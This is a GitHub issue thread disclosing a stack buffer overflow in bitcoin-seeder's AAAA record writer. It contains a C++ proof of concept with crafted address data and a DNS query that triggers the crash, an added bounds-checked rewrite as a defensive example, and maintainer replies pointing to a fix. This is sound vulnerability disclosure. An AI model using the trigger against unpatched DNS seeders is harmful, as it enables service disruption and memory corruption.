Stack corruption #86

Open
guidovranken opened this issue Oct 15, 2020 · 2 comments


If a sufficient amount of AAAA records is associated with a DNS request, a buffer overflow will occur in write_record_aaaa; up to 11 bytes beyond the end of the output buffer can be overwritten.

Append this to dns.cpp:

```cpp
// PoC data: each row is the raw 20-byte image of one addr_t (a 4-byte version
// field, 4 or 6, followed by the 16-byte address payload). 19 entries are
// enough for the AAAA answers to no longer fit in the output buffer.
const uint8_t addresses[19][20] = {
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x04,  },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x1E, 0x03, 0x00, 0x00, 0x00, 0x31, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A,  } };

// Lookup callback handed to dnshandle() via dns_opt_t::cb: copies up to `max`
// (and at most 19) of the canned addresses into the caller's addr_t array and
// returns how many were filled in.
int cb(void *opt, char *requested_hostname, addr_t *addr, int max, int ipv4, int ipv6) {
    uint32_t num = 0;
    while ( num < max && num < 19 ) {
        memcpy(&addr[num], addresses[num], 20);
        num++;
    }
    return num;
}

int main(void)
{
    // Minimal DNS query; the answers for it are produced by cb() above.
    const uint8_t in[] = {0x1B, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x23, 0x00,
                          0x7A, 0x08, 0x00, 0x00, 0xFF, 0x00, 0xFF};
    uint8_t out[BUFLEN];   // output buffer that write_record_aaaa overruns
    dns_opt_t opt;
    opt.port = 0;
    opt.datattl = 0;
    opt.nsttl = 0;
    opt.host = "";
    opt.ns = "";
    opt.mbox = "";
    opt.cb = cb;
    opt.nRequests = 0;
    dnshandle(&opt, in, sizeof(in), out);
    return 0;
}
```

```
$ g++ dns.cpp && ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
```
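The report above is the classic shape of an answer-section overflow: the record writer trusts the caller's count and never compares the bytes it is about to emit with the space left in the output buffer. The following is an added example, not code from bitcoin-seeder and not the fix in b1cf356: a bounds-checked AAAA writer that refuses any record that would not fit and a fill loop that stops at the first refusal. The function names (`write_record_aaaa_checked`, `write_aaaa_answers`), the 28-byte record layout (2-byte compression pointer plus fixed fields plus 16-byte address), the 100-byte buffer and the synthetic addresses are all my assumptions, chosen to illustrate the check, not taken from the project.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Wire size of one AAAA answer whose owner name is a 2-byte compression
 * pointer: NAME(2) TYPE(2) CLASS(2) TTL(4) RDLENGTH(2) RDATA(16). Assumed
 * layout for this example, not the seeder's. */
#define AAAA_RR_LEN 28

/* Write one AAAA resource record at out[pos] only if all AAAA_RR_LEN bytes fit
 * inside out[0..outlen). Returns AAAA_RR_LEN on success, -1 if it would overrun
 * the buffer; nothing is written in the failure case. The subtraction is done
 * on the unsigned side only after pos <= outlen has been established. */
int write_record_aaaa_checked(uint8_t *out, size_t outlen, size_t pos,
                              uint16_t name_offset, uint32_t ttl,
                              const uint8_t addr[16]) {
    if (pos > outlen || outlen - pos < AAAA_RR_LEN) return -1;
    uint8_t *p = out + pos;
    p[0] = (uint8_t)(0xC0 | ((name_offset >> 8) & 0x3F)); /* compression pointer */
    p[1] = (uint8_t)(name_offset & 0xFF);
    p[2] = 0x00; p[3] = 28;                                /* TYPE = AAAA */
    p[4] = 0x00; p[5] = 1;                                 /* CLASS = IN */
    p[6] = (uint8_t)(ttl >> 24); p[7] = (uint8_t)(ttl >> 16);
    p[8] = (uint8_t)(ttl >> 8);  p[9] = (uint8_t)ttl;
    p[10] = 0x00; p[11] = 16;                              /* RDLENGTH = 16 */
    memcpy(p + 12, addr, 16);
    return AAAA_RR_LEN;
}

/* Append as many of the supplied 16-byte addresses (packed back to back in
 * addrs) as fit after out[pos]. Returns the number of records written and
 * stores the new end offset in *end_pos. A caller that gets fewer than naddrs
 * back knows the answer was cut short and can set the TC bit in the header. */
int write_aaaa_answers(uint8_t *out, size_t outlen, size_t pos,
                       const uint8_t *addrs, int naddrs,
                       uint32_t ttl, size_t *end_pos) {
    int written = 0;
    for (int i = 0; i < naddrs; i++) {
        int n = write_record_aaaa_checked(out, outlen, pos, 12, ttl,
                                          addrs + 16 * (size_t)i);
        if (n < 0) break;            /* buffer full: stop, do not overflow */
        pos += (size_t)n;
        written++;
    }
    *end_pos = pos;
    return written;
}

int main(void) {
    /* Constructed sample: 19 synthetic IPv6 addresses, the same count the
     * PoC feeds the seeder, packed as 19 * 16 bytes. */
    uint8_t addrs[19 * 16];
    for (int i = 0; i < 19; i++) {
        memset(addrs + 16 * i, 0, 16);
        addrs[16 * i] = 0x20; addrs[16 * i + 1] = 0x01;
        addrs[16 * i + 15] = (uint8_t)(i + 1);
    }
    /* 100 usable bytes followed by a 16-byte guard region filled with 0xAA;
     * the guard must be untouched after the fill loop. */
    uint8_t out[100 + 16];
    memset(out, 0xAA, sizeof(out));
    size_t end = 0;
    int n = write_aaaa_answers(out, 100, 12, addrs, 19, 3600, &end);
    printf("wrote %d of 19 AAAA records, answer section ends at byte %zu\n", n, end);
    for (size_t i = 100; i < sizeof(out); i++) {
        if (out[i] != 0xAA) { puts("guard region corrupted"); return 1; }
    }
    return 0;
}
```

With 88 bytes free after a 12-byte header, only three 28-byte records fit, so the loop writes three and stops at offset 96; the fourth record would have needed bytes 96..123 and is refused rather than partially written. Checking `outlen - pos` before every record, rather than trusting the count returned by the lookup callback, is the property the original writer lacked.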
sipa commented Oct 19, 2020

Thanks for reporting! Should be fixed in b1cf356.

@practicalswift

Nice catch @guidovranken!

Very excited about your work: thanks for helping hardening various parts of the Bitcoin ecosystem by trying to break it! :)

I saw the Trezor firmware bug you found in trezor/trezor-firmware#1374 the other day too. Solid work!
